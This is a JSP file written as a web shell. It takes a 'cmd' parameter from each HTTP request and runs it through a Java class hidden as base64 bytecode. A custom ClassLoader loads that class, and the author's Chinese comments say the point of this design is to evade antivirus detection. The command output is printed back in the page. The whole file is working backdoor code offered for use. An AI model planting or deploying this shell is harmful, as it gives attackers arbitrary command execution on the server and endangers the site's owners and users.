<%--<%@ page import="java.util.Base64" %>--%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.io.IOException" %>
<%@ page import="java.util.Base64" %>
<%@ page pageEncoding="UTF-8" language="java" %>
<%

    /**
     * author by guowei
     * 重写Classloader，利用字节码免杀
     * jdk：8
     */
    String cmd =request.getParameter("cmd");
    ClassLoader classLoader = new ClassLoader() {
        @Override
        public Class<?> loadClass(String name) throws ClassNotFoundException {
            if (name.contains("Evalforbytes")) {
                return findClass(name);
            } else {
                return super.loadClass(name);
            }
        }
        @Override
        protected Class<?> findClass(String name) throws ClassNotFoundException{
            byte [] bytes = Base64.getDecoder().decode("yv66vgAAADQAUQoAEQAvBwAwCgACAC8KADEAMgoAMQAzBwA0BwA1CgA2ADcKAAcAOAoABgA5CgAGADoKAAIAOwgAPAoAAgA9CQAQAD4HAD8HAEABAAJhcwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTE15Y2xhc3Nsb2FkZXIvRXZhbGZvcmJ5dGVzOwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAAWEBAA1TdGFja01hcFRhYmxlBwA/BwBBBwAwBwBCBwA0AQAKRXhjZXB0aW9ucwcAQwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQARRXZhbGZvcmJ5dGVzLmphdmEMABQARAEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwBFDABGAEcMAEgASQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyBwBCDABKAEsMABQATAwAFABNDABOACwMAE8AUAEAAQoMACsALAwAEgATAQAaTXljbGFzc2xvYWRlci9FdmFsZm9yYnl0ZXMBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N0cmluZwEAEWphdmEvbGFuZy9Qcm9jZXNzAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7ACEAEAARAAAAAQABABIAEwAAAAIAAQAUABUAAgAWAAAA5wAFAAYAAABLKrcAAbsAAlm3AANNuAAEK7YABU67AAZZuwAHWS22AAi3AAm3AAo6BBkEtgALWToFxgASLBkFtgAMEg22AAxXp//pKiy2AA61AA+xAAAAAwAXAAAAIgAIAAAACgAEAAsADAAMABQADQAoAA8AMwAQAEIAEgBKABUAGAAAAD4ABgAAAEsAGQAaAAAAAABLABsAEwABAAwAPwAcAB0AAgAUADcAHgAfAAMAKAAjACAAIQAEADAAGwAiABMABQAjAAAAHgAC/wAoAAUHACQHACUHACYHACcHACgAAPwAGQcAJQApAAAABAABACoAAQArACwAAQAWAAAALwABAAEAAAAFKrQAD7AAAAACABcAAAAGAAEAAAAZABgAAAAMAAEAAAAFABkAGgAAAAEALQAAAAIALg==");

            //                BASE64Decoder decoder = new BASE64Decoder();
//                下面这一段是恶意类的字节码的base64编码
//                byte[] bytes = decoder.decodeBuffer("yv66vgAAADMAUQoAEQAvBwAwCgACAC8KADEAMgoAMQAzBwA0BwA1CgA2ADcKAAcAOAoABgA5CgAGADoKAAIAOwgAPAoAAgA9CQAQAD4HAD8HAEABAAJhcwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEABjxpbml0PgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTE15Y2xhc3Nsb2FkZXIvRXZhbGZvcmJ5dGVzOwEAA2NtZAEADXN0cmluZ0J1aWxkZXIBABlMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEAAWEBAA1TdGFja01hcFRhYmxlBwA/BwBBBwAwBwBCBwA0AQAKRXhjZXB0aW9ucwcAQwEACHRvU3RyaW5nAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAApTb3VyY2VGaWxlAQARRXZhbGZvcmJ5dGVzLmphdmEMABQARAEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyBwBFDABGAEcMAEgASQEAFmphdmEvaW8vQnVmZmVyZWRSZWFkZXIBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyBwBCDABKAEsMABQATAwAFABNDABOACwMAE8AUAEAAQoMACsALAwAEgATAQAaTXljbGFzc2xvYWRlci9FdmFsZm9yYnl0ZXMBABBqYXZhL2xhbmcvT2JqZWN0AQAQamF2YS9sYW5nL1N0cmluZwEAEWphdmEvbGFuZy9Qcm9jZXNzAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAAygpVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7ACEAEAARAAAAAQABABIAEwAAAAIAAQAUABUAAgAWAAAA5wAFAAYAAABLKrcAAbsAAlm3AANNuAAEK7YABU67AAZZuwAHWS22AAi3AAm3AAo6BBkEtgALWToFxgASLBkFtgAMEg22AAxXp//pKiy2AA61AA+xAAAAAwAXAAAAIgAIAAAACgAEAAsADAAMABQADQAoAA8AMwAQAEIAEgBKABUAGAAAAD4ABgAAAEsAGQAaAAAAAABLABsAEwABAAwAPwAcAB0AAgAUADcAHgAfAAMAKAAjACAAIQAEADAAGwAiABMABQAjAAAAHgAC/wAoAAUHACQHACUHACYHACcHACgAAPwAGQcAJQApAAAABAABACoAAQArACwAAQAWAAAALwABAAEAAAAFKrQAD7AAAAACABcAAAAGAAEAAAAZABgAAAAMAAEAAAAFABkAGgAAAAEALQAAAAIALg==");
            return  defineClass(name,bytes,0,bytes.length);
        }
    };
    Class<?> cl =classLoader.loadClass("Myclassloader.Evalforbytes");
    Constructor cos = cl.getConstructor(String.class);
    Object obj = cos.newInstance(cmd);
    response.getWriter().print("<pre>");
    response.getWriter().print(obj.toString());
    response.getWriter().print("</pre>");
%>